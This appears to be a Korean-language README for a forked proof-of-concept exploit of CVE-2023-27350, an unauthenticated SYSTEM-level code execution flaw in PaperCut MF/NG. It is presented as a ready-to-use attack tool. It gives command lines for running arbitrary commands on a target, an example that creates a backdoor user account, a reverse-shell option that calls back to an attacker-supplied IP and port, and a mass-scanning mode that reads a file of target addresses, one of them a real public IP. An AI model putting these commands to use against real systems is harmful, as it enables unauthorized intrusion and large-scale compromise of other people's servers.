
Papercut CVE-2023-27350에 대한 익스플로잇. [+] 리버스 셸 [+] 대량 검사
이는 PaperCut MF/NG에서 발견된 취약점 CVE-2023-27350에 대한 개념 증명(PoC) 익스플로잇입니다. 인증되지 않은 공격자가 SYSTEM 권한으로 임의 코드를 실행할 수 있게 합니다.
이 익스플로잇을 사용하기 전에 다음 라이브러리가 설치되어 있는지 확인하십시오:
pip install -r requirements.txt
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]
-u, --url: 대상 PaperCut MF/NG 애플리케이션의 URL (예: http://target-ip:9191).-c, --command: 대상 시스템에서 실행할 명령어.--reverse-shell: 대상 시스템에서 명령어를 실행하기 위해 리버스 셸 페이로드를 사용합니다.-f, --file: 파일에서 여러 대상 확인 (예: file.txt).대상 시스템에서 명령어를 실행하려면 -c 옵션을 사용하십시오:
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"
대상 시스템에서 명령어를 실행하기 위해 리버스 셸 페이로드를 사용하려면 --reverse-shell 옵션을 사용하십시오. IP 주소와 포트 번호를 입력하라는 메시지가 표시됩니다:
: : <> : <>
파일에서 여러 대상을 확인하려면 -f 옵션을 사용하십시오. 파일 형식은 ip_address:port여야 합니다:
python CVE-2023-27350.py -f file.txt
file.txt 형식 지정file.txt 입력으로 대량 확인 옵션을 사용할 때 파일 내용이 올바르게 형식화되어 있는지 확인하십시오.
파일의 각 줄은 콜론(:)으로 구분된 대상의 IP 주소와 포트 번호를 포함해야 합니다. 예:
110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080
IP 주소, 콜론, 포트 번호 사이에 추가 공백이나 문자가 없어야 합니다. 또한 각 줄에는 하나의 IP 주소와 포트 번호만 포함되어야 합니다.
이 저장소는 horizon3ai/CVE-2023-27350의 포크 버전입니다. 원본 익스플로잇에 대한 모든 크레딧은 해당 작성자에게 있습니다.